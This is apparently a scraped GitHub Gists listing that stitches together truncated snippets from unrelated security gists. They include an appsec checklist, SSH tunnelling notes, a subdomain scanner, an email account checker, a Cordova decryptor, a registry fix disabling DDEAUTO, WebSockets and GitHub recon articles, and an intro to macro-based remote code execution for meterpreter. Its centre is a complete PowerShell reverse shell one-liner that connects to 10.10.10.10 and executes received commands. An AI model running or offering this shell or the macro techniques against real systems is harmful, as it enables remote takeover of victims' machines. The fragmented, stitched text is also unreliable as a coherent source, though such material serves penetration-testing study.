A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
arthusu
jhaddix
/ Testing_Checklist.md
Last active
June 17, 2025 05:54
— forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
Sometimes it is useful to route traffic through a different machine for testing or development. At work, we have a VPN to a remote facility that we haven't bothered to fix for routing, so the only way to access a certain machine over that VPN is via an SSH tunnel to a machine that is reachable over the VPN. Other times, I have used this technique to test internet-facing requests against sites I am developing. It is pretty easy, and if you don't use firefox regularly, you can treat Firefox as your "Proxy" browser and other browsers can use a normal configuration (Although you can also configure an entire system to use the proxy, other articles exists that discuss this potential).
- Open a terminal
egre55
/ powershell_reverse_shell.ps1
Last active
July 4, 2025 09:10
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Usage : ./scanio.sh <save file> | |
| # Example: ./scanio.sh cname_list.txt | |
| # Premium | |
| function ech() { | |
| spinner=( "|" "/" "-" "\\" ) | |
| while true; do | |
| for i in ${spinner[@]}; do | |
| echo -ne "\r[$i] $1" |
haccer
/ account_checker.sh
Created
January 31, 2018 12:37
PoC Email Account Checker - Checks for emails that don't exist so they can be (re)created
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # PoC Email Account Checker - Checks for emails that don't exist so they can be (re)created | |
| # Use Chrome's Network tab to view the URL that makes these type of requests. | |
| # This is just a PoC, you can add in other email services along with other domains the current ones provide. | |
| # URLs have been working all night, but might need to be updated in the future. | |
| # | |
| # Usage: ./account_checker.sh <email_list> | |
| function google() { | |
| # Post data |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Blogpost: https://rz.my/2017/11/decrypting-cordova-crypt-file-plugin.html | |
| var fs = require("fs"), | |
| path = require("path"), | |
| crypto = require("crypto"); | |
| var config = { | |
| key : 'CRYPT_KEY', | |
| iv : 'CRYPT_IV' | |
| } |
wdormann
/ disable_ddeauto.reg
Last active
October 1, 2024 17:10
Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options] | |
| "DontUpdateLinks"=dword:00000001 | |
| [HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options] | |
| "DontUpdateLinks"=dword:00000001 | |
| [HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options] | |
| "DontUpdateLinks"=dword:00000001 |
sonahri
/ WebSockets.md
Created
September 13, 2017 17:34
— forked from subudeepak/WebSockets.md
The problems and some security implications of websockets - Cross-site WebSockets Scripting (XSWS)
WebSockets is a modern HTML5 standard which makes communication between client and server a lot more simpler than ever. We are all familiar with the technology of sockets. Sockets have been fundamental to network communication for a long time but usually the communication over the browser has been restricted. The general restrictions
- The server used to have a permanent listener while the client (aka browser) was not designated any fixed listener for a more long term connection. Hence, every communication was restricted to the client demanding and the server responding.
- This meant that unless the client requested for a particular resource, the server was unable to push such a resource to the client.
- This was detrimental since the client is then forced to check with the server at regular intervals. This meant a lot of libraries focused on optimizing asynchronous calls and identifying the response of asynchronous calls. Notably t
sonahri
/ github_bugbountyhunting.md
Created
September 1, 2017 13:54
— forked from EdOverflow/github_bugbountyhunting.md
My tips for finding security issues in GitHub projects.
GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.
You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.
$ python githubcloner.py --org organization -o /tmp/output
mgeeky
/ Various-Macro-Based-RCEs.md
Last active
July 15, 2025 12:45
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.
This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.
All of the below examples had been generated for using as a remote address: 192.168.56.101.
List:
- Page substiution macro for luring user to click Enable Content
- The Unicorn Powershell based payload